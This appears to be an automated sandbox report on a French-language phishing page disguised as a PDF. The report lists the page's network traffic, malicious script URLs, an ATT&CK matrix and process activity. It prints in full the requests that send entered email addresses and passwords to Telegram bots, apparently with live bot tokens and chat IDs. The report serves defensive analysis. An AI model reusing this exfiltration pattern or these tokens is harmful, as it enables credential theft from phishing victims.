    Source: global trafficHTTP traffic detected: GET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficDNS traffic detected: DNS query: cdn.tailwindcss.com
    Source: global trafficDNS traffic detected: DNS query: facture-75823.web.app
    Source: global trafficDNS traffic detected: DNS query: i.ibb.co
    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: chromecache_126.1.drString found in binary or memory: https://api.ipify.org?format=json
    Source: chromecache_126.1.drString found in binary or memory: https://api.telegram.org/bot$
    Source: chromecache_130.1.dr, Demande.pdf.html.crdownload.0.drString found in binary or memory: https://cdn.tailwindcss.com
    Source: chromecache_138.1.drString found in binary or memory: https://evilmartians.com/chronicles/postcss-8-plugin-migration
    Source: chromecache_130.1.dr, Demande.pdf.html.crdownload.0.drString found in binary or memory: https://facture-75823.web.app/anti9.js
    Source: chromecache_130.1.dr, Demande.pdf.html.crdownload.0.drString found in binary or memory: https://facture-75823.web.app/loader_ad.js
    Source: chromecache_130.1.dr, Demande.pdf.html.crdownload.0.drString found in binary or memory: https://facture-75823.web.app/styles_ad.css
    Source: chromecache_130.1.dr, Demande.pdf.html.crdownload.0.drString found in binary or memory: https://facture-75823.web.app/telegram.js
    Source: chromecache_138.1.drString found in binary or memory: https://github.com/browserslist/browserslist#readme
    Source: chromecache_138.1.drString found in binary or memory: https://github.com/jonschlinkert/fill-range
    Source: chromecache_138.1.drString found in binary or memory: https://github.com/jonschlinkert/is-number
    Source: chromecache_138.1.drString found in binary or memory: https://github.com/micromatch/to-regex-range
    Source: chromecache_138.1.drString found in binary or memory: https://github.com/postcss/autoprefixer#readme
    Source: chromecache_140.1.drString found in binary or memory: https://i.ibb.co/6cXYk9HM/Capture-d-cran-2025-02-11-144928.png
    Source: chromecache_138.1.drString found in binary or memory: https://mths.be/cssesc
    Source: chromecache_138.1.drString found in binary or memory: https://tailwindcss.com/docs/installation
    Source: chromecache_138.1.drString found in binary or memory: https://twitter.com/browserslist
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.7:49691 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.7:49692 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.7:49693 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.41.16:443 -> 192.168.2.7:49696 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49698 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.7:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.7:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5804_1948544833Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5804_1948544833Jump to behavior
    Source: classification engineClassification label: mal72.phis.troj.win@33/32@20/9
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\c353aa34-ff97-490b-8c68-5ba62f9846b3.tmpJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,13775181558258972133,7707862200388720938,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2052 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download"
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,5492377399383372015,5736696650145725738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250324-180219.885000 --mojo-platform-channel-handle=2084 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\Demande.pdf.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,13775181558258972133,7707862200388720938,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2052 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,5492377399383372015,5736696650145725738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250324-180219.885000 --mojo-platform-channel-handle=2084 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    11
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Web Service
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    File Deletion
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
    Ingress Tool Transfer
    Scheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1648148 URL: https://drive.usercontent.g... Startdate: 25/03/2025 Architecture: WINDOWS Score: 72 29 Suricata IDS alerts for network traffic 2->29 31 Yara detected HtmlPhish29 2->31 33 Uses the Telegram API (likely for C&C communication) 2->33 35 3 other signatures 2->35 6 chrome.exe 14 2->6         started        9 chrome.exe 2->9         started        11 chrome.exe 2->11         started        13 chrome.exe 2->13         started        process3 dnsIp4 20 192.168.2.7, 138, 443, 49672 unknown unknown 6->20 15 chrome.exe 6->15         started        18 chrome.exe 9->18         started        process5 dnsIp6 22 api.telegram.org 15->22 25 api.telegram.org 149.154.167.220, 443, 49715, 49716 TELEGRAMRU United Kingdom 15->25 27 7 other IPs or domains 15->27 signatures7 37 Uses the Telegram API (likely for C&C communication) 22->37

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://facture-75823.web.app/anti9.js0%Avira URL Cloudsafe
    https://facture-75823.web.app/loader_ad.js0%Avira URL Cloudsafe
    https://facture-75823.web.app/styles_ad.css0%Avira URL Cloudsafe
    file:///C:/Users/user/Downloads/Demande.pdf.html0%Avira URL Cloudsafe
    https://mths.be/cssesc0%Avira URL Cloudsafe
    https://facture-75823.web.app/telegram.js0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    facture-75823.web.app
    199.36.158.100
    truefalse
      unknown
      cdn.tailwindcss.com
      172.67.41.16
      truefalse
        high
        www.google.com
        142.251.40.164
        truefalse
          high
          drive.usercontent.google.com
          142.250.80.33
          truefalse
            high
            api.ipify.org
            104.26.13.205
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                i.ibb.co
                207.174.26.219
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://facture-75823.web.app/anti9.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.tailwindcss.com/3.4.16false
                    high
                    https://api.telegram.org/bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36false
                      high
                      https://facture-75823.web.app/styles_ad.cssfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://facture-75823.web.app/telegram.jsfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://i.ibb.co/6cXYk9HM/Capture-d-cran-2025-02-11-144928.pngfalse
                        high
                        https://api.telegram.org/bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36false
                          high
                          https://cdn.tailwindcss.com/false
                            high
                            https://facture-75823.web.app/loader_ad.jsfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36false
                              high
                              https://api.ipify.org/?format=jsonfalse
                                high
                                file:///C:/Users/user/Downloads/Demande.pdf.htmltrue
                                • Avira URL Cloud: safe
                                unknown
                                https://api.telegram.org/bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://cdn.tailwindcss.comchromecache_130.1.dr, Demande.pdf.html.crdownload.0.drfalse
                                    high
                                    https://github.com/jonschlinkert/fill-rangechromecache_138.1.drfalse
                                      high
                                      https://github.com/postcss/autoprefixer#readmechromecache_138.1.drfalse
                                        high
                                        https://api.ipify.org?format=jsonchromecache_126.1.drfalse
                                          high
                                          https://evilmartians.com/chronicles/postcss-8-plugin-migrationchromecache_138.1.drfalse
                                            high
                                            https://github.com/micromatch/to-regex-rangechromecache_138.1.drfalse
                                              high
                                              https://github.com/browserslist/browserslist#readmechromecache_138.1.drfalse
                                                high
                                                https://tailwindcss.com/docs/installationchromecache_138.1.drfalse
                                                  high
                                                  https://api.telegram.org/bot$chromecache_126.1.drfalse
                                                    high
                                                    https://mths.be/cssescchromecache_138.1.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://twitter.com/browserslistchromecache_138.1.drfalse
                                                      high
                                                      https://github.com/jonschlinkert/is-numberchromecache_138.1.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        207.174.26.219
                                                        i.ibb.coUnited States
                                                        6079RCN-ASUSfalse
                                                        104.26.12.205
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        172.67.41.16
                                                        cdn.tailwindcss.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.80.33
                                                        drive.usercontent.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.251.40.164
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        199.36.158.100
                                                        facture-75823.web.appUnited States
                                                        15169GOOGLEUSfalse
                                                        149.154.167.220
                                                        api.telegram.orgUnited Kingdom
                                                        62041TELEGRAMRUfalse
                                                        104.26.13.205
                                                        api.ipify.orgUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.7
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1648148
                                                        Start date and time:2025-03-25 15:44:03 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 30s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal72.phis.troj.win@33/32@20/9
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
